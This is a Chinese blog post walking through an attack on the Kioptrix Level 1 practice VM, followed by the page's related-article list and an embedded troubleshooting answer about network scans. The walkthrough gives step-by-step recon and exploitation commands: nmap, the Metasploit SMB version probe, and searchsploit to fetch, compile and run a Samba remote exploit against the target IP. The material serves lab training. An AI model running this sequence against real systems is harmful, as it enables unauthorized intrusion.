攻破 Kioptix Level 1 靶机

原创 已于 2024-12-28 12:31:25 修改 · 473 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #linux #网络

于 2024-12-28 12:31:07 首次发布

找教程然后自己练习,论菜狗的自我修养

基本步骤

1.确定目标IP

2.扫描端口,服务,版本信息,漏洞信息

3.查找漏洞可利用脚本

4.运行脚步

一、信息获取

arp-scan -l

nmap -sS -p- -sV -sC -A --min-rate=5000 192.168.5.130

二、查找可利用漏洞并攻击

思路a.  139端口Samba服务

由于 -sV 未探测到其版本,用 msf 的模块进行探测

msfcomsole

use auxiliary/scanner/smb/smb_version

show options

set RHOSTS 192.168.5.130

run

查找、利用漏洞

searchsploit Samba 2.2

searchsploit -m multiple/remote/10.c

gcc 10.c -o k1exp

head 10.c -n 50

./k1exp -b 0 -v 192.168.5.130        

思路b. 80端口 apache mode_ssl

searchsploit mod_ssl

searchsploit -m unix/remote/47080.c

head 47080.c -n 50

apt-get install libssl-dev

gcc 47080.c -o k11exp -lcrypto

选择一个找到的漏洞叫版本并查看使用fang

libssl-dev 可下载

libssl1.0-dev 下载不了

编译出错

可能kali版本太老了。

补充说明

arp-scan -l

arp-scan 是一个用于发送 ARP 请求以发现和映射本地网络中的设备的工具.

-l--localnet:这个选项会让 arp-scan 扫描本地网络(即与执行命令的主机在同一子网中的设备)

最后会列出本地网络中发现的所有设备,包括它们的 MAC 地址、IP 地址和厂商信息。

Kioptix Level 1靶机笔记
Blanks的博客
12-11 1986
练习靶机环境最大可能贴近实战,去将渗透的思维与渗透的操作进行磨合,实践才能磨炼技术。
Kioptix Level 1靶场渗透测试
sucker的博客
12-04 3114
学习视频来自B站up主 **泷羽sec** 有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!根据你提供的问题,你正在尝试执行一段命令序列,其中包括下载一个名为“ptrace-kmod.c”的文件,编译它,删除源文件,并最终运行生成的可执行文件。然而,在执行过程中,你遇到了几个问题。最后,rm命令也无法删除名为“ptrace-kmod.c”的文件,因为该文件不存在。
Vulnhub系列:Kioptix Level 1
2302_78903258的博客
07-25 1258
从上图可以看到,这个apache服务是用的mod_ssl模块,按照之前的方法,先用msf搜索下有没有这个模块相关的漏洞,进入msfconsole模块,用msf进行搜索。靶机的mod_ssl版本为2.8.4,加上我用的linux系统,所以这边exp选择三个.c中的一个,我这里选择47080.c(跟着网上教程走········)总结:一个是利用msf自带的漏洞利用模块进行攻击,一个是用searchsploit找到exp,然后编译后执行攻击。发现有两个模块可以用,一个是RHOSTS,一个是RPORT。
类OSCP靶机-Kioptix Level 1
ETO发展中心
07-29 1102
同步发布:https://www.youi.xin/?p=435 类OSCP靶机-Kioptix Level 1 官方下载地址:Kioptrix: Level 1 (#1): https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 百度云下载地址:链接:https://pan.baidu.com/s/1aYc6P2aqPCL4jY1H-G6Z1w 提取码:youi vulnhub简介 https://www.vulnhub.com/about/
#渗透测试#红队攻防 kioptix level 2靶机getshell及提权
m0_74786138的博客
12-10 1360
声明!文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!
【vulnhub——Kioptrix Level 1靶机
jieli0901227的博客
05-26 845
找到samba 版本信息,通过https://www.exploit-db.com/ 漏洞利用库 查找这个版本有个远程代码执行漏洞,我们试试。Kioptrix这个系列靶机默认是桥接模式,如果我们kali使用NAT是扫描不到靶机的,通过VM的靶机网络设置也不能更改成功。下载的文件解压后,编辑 Kioptix Level 1.vmx 文件,删除以 ethernet0开头的行,并保存,发现 MRTG 2.9.6 可能是个应用, 搜索版本可能存在的漏洞,,没有可利用的信息。那么我们尝试这个版本漏洞搜索。
攻破 kioprix level 4 靶机
Bulestardemon的博客
12-28 1219
kioprix level 4 靶机实验。
oscp备考 oscp系列——Kioptix Level 1靶场 古老的 Apache Vuln
xxx_un的博客
01-04 1550
oscp备考,oscp系列——Kioptix Level 1靶场 Kioptix Level 1难度为简单靶场,主要考察 nmap的使用已经是否会看输出,以及是否会通过应用查找对应漏洞 主要有mod_ssl低版本的getshell漏洞和samba的溢出getshell漏洞(CVE-2007-2447) nmap不能探测出samba版本,需要使用msf的smb_version进行探测
Vulnhub靶机:Kioptrix_Level1
qq_48904485的博客
03-12 1328
运行环境:Virtualbox攻击机:kali(192.168.56.101靶机:Kioptrix_Level1192.168.56.105)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
#红队攻防#渗透测试-Kioptix Level 1靶机getshell及提权教程
m0_74786138的博客
12-06 1495
这个靶机可以利用的exp方式还有很多,以上只是其中一种,想要完成掌握还需要多加学习比如加入我们的帮会,里面有各种资料进行分享,以及靶机攻击超详细教程吗,期待大家的加入。
无网环境下的终端登录安全:一个被忽视的等保盲区
安当加密
01-01 796
在等保2.0全面落地的今天,大多数企业已部署防火墙、EDR、日志审计等纵深防御体系。。尤其在的环境中(如监控室、工控机房、财务内网终端),这一风险被进一步放大。
软考 系统架构设计师系列知识点之安全架构设计理论与实践(18)
phmatthaus的专栏
01-03 113
软考 系统架构设计师系列知识点之安全架构设计理论与实践(18)
安全隐私页面 Cordova&OpenHarmony 混合开发实战
2501_94444908的博客
12-29 524
本文介绍了家庭菜谱应用的安全隐私模块实现方案。该模块通过Cordova&OpenHarmony混合架构,Web层负责展示清理选项和确认对话框,ArkTS原生层执行实际数据操作。主要功能包括清除缓存和重置应用,通过不同按钮样式区分操作风险级别。清除缓存会删除临时文件,而重置应用则会清空所有菜谱数据。实现上采用"Web交互+原生执行"的安全分工模式,Web层处理用户确认和提示,原生层通过SecurityPlugin执行文件删除操作。该设计既保证了数据安全,又提供了良好的用户体验。
电子电器架构 --- 主机厂的安全理念(下)
Soly_kun的博客
12-29 206
摘要:本文以汽车电子工程师视角,探讨智能汽车时代的安全理念与实践。作者强调安全是主机厂的生命线,并重点分析了蔚来汽车的四大信息安全原则:最小权限原则从源头控制风险,零信任设计打破传统安全预设,分层纵深防御构建"云-管-端"防护体系。文章指出,在汽车智能化转型中,信息安全已成为维系用户信任的核心纽带,需要贯穿研发、生产、服务全流程。通过系统化的安全体系建设,才能应对日益复杂的网络安全挑战,守护用户生命财产安全。(149字)
Java 安全的单例模式详解
萧曳丶
01-01 370
单例模式是一种确保类只有一个实例并提供全局访问点的设计模式。文章详细介绍了多种实现方式:非安全的懒汉式、线程安全的饿汉式、同步方法懒汉式、双重检查锁、静态内部类以及枚举实现,并分析了各自的优缺点。特别强调了如何防止反射攻击、序列化破坏等安全隐患,提供了完整的安全单例示例。文章还比较了不同场景下的最佳实践方案,推荐简单场景用饿汉式,高安全要求用枚举实现,并介绍了现代Java中的Supplier和CompletableFuture实现方式。最后指出单例模式可能隐藏依赖关系、测试困难等问题,建议根据线程安全、性能
阿里千问安全审核大模型,本地部署,实测
12-29 726
大家好,我是 Ai 学习的老章
解锁高效安全办公新形态:信创云桌面的核心价值与行业实践
Raysync2025的博客
12-29 548
对于正走在信创深化之路上的组织而言,选择一个架构先进、生态开放、服务专业的云桌面平台,无疑将为未来的可持续发展奠定坚实的信息化基石。信创云桌面,并非简单的桌面环境虚拟化,而是以国产化核心技术为底座,构建的一套涵盖终端、接入、平台、应用与数据的完整体系。:采用高效的桌面传输协议,即使在复杂的专业图形设计、视频播放等场景下,也能保障用户获得接近本地PC的操作体验,且对网络带宽具备良好的适应性。:能够根据不同部门、岗位的需求,精准、敏捷地交付对应的桌面环境与应用,并对其全生命周期进行监控、优化与自动化管理。
vDisk VOI/IDV:Windows启动性能优化与安全部署攻略
最新发布
桌面虚拟化
01-04 71
vDisk VOI/IDV
如何快速识别游戏安全运营中外挂与多开用户?
2401_86761558的博客
12-29 954
本文从工程视角探讨IP在游戏反外挂与多开治理中的核心作用。文章指出IP作为连接账号、设备和网络的关键信号,具有天然聚集性和结构性特征,能够提供网络类型、地域稳定性等可计算风险特征。通过Python代码示例展示了IP查询在风控系统的实现方法,包括在线API调用和离线数据库方案,并给出完整的风险决策模型。最后针对不同场景推荐了IP数据库选型方案,强调IP数据应作为长期沉淀的安全能力而非简单接口调用。全文提供可直接落地的技术方案,为游戏安全防护提供实用参考。
kioptix level 1靶场扫描没反应 已使用nat模式
03-17
<think>嗯,用户遇到了Kioptrix Level 1靶场扫描无响应的问题,用的是NAT模式。首先,我需要回想一下常见的原因。可能网络配置有问题,比如虚拟机的网络设置是否正确,是否处于同一网段。然后,用户可能没关闭防火墙或者靶机没正确启动服务。另外,扫描参数是否正确也很重要,比如nmap的参数是否合适。 我记得之前看过引用里的内容,用户用了nmap的-sn参数扫描,但可能没正确指定目标IP。需要确认靶场的IP地址是否在同一个子网下。有时候虚拟机使用NAT模式可能需要端口转发或者检查虚拟网络编辑器的设置,比如VMware的NAT设置是否有问题。 另外,用户提到靶场比较古老,可能Apache和服务的版本较低,是否兼容当前的环境?比如,是否因为服务未启动导致无法响应扫描。还要考虑主机防火墙是否阻止了连接,或者虚拟机的网络适配器是否正确连接。 可能的解决步骤包括:检查虚拟机网络配置,确认IP地址,使用正确的nmap参数(比如-p指定端口范围),关闭防火墙,重启服务等。此外,用户可能需要检查主机和虚拟机之间的连通性,比如ping测试,或者使用ARP扫描来发现靶机。 需要注意的是,有些情况下NAT模式可能需要手动设置静态IP,或者检查DHCP分配。如果扫描时没反应,可能是靶机没有获取到正确的IP,或者主机无法路由到靶机网络。这时候可能需要检查虚拟网络设置,确保NAT网络配置正确,或者尝试桥接模式看看是否是NAT模式的问题。 还有,用户是否在扫描时使用了正确的目标网段?比如,如果主机在192.168.1.x,而靶机可能分配到了不同的子网,比如192.168.152.x,这时候需要调整扫描的IP范围。此外,nmap的--min-rate参数可能在高版本中需要调整,或者结合其他参数如-Pn来跳过主机发现。 总结下来,解决方案的步骤应该是:确认网络配置、检查IP地址、调整nmap参数、关闭防火墙、验证服务状态,如果不行再考虑更换网络模式或检查虚拟网络设置。</think>### Kioptrix Level 1靶场扫描无响应解决方案 #### 1. 验证网络配置 - **检查虚拟机网络模式**:确认靶机和攻击机(如Kali Linux)均设置为`NAT模式`,并在VMware/VirtualBox的虚拟网络编辑器中确保`NAT子网网段一致`(例如192.168.152.0/24)[^2] - **获取靶机IP**:在靶机启动后登录系统(默认账号`root`/空密码),执行`ifconfig`或`ip addr`获取实际分配的IP地址 #### 2. 优化扫描参数 ```bash nmap -sn 192.168.152.0/24 --min-rate 1000 # 快速扫描存活主机 nmap -Pn -p 1-65535 192.168.152.130 # 跳过主机发现,全端口扫描 ``` #### 3. 常见问题排查 | 问题类型 | 解决方案 | |---------|----------| | 防火墙拦截 | 靶机执行`service iptables stop`关闭防火墙 | | 服务未启动 | 检查`apache`状态:`service httpd status` | | ARP缓存问题 | 攻击机执行`arp-scan -l`扫描本地网络 | #### 4. 网络连通性验证 ```bash ping 靶机IP # 测试基础连通性 telnet 靶机IP 80 # 测试Web服务端口 tcpdump -i eth0 icmp # 抓包分析网络流量 ``` #### 5. 特殊场景处理 - **NAT模式失效**:尝试切换为`桥接模式`后重新扫描 - **DHCP未分配IP**:在VMware虚拟网络编辑器中重置NAT DHCP租约 - **虚拟机冲突**:关闭其他虚拟机避免IP冲突
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值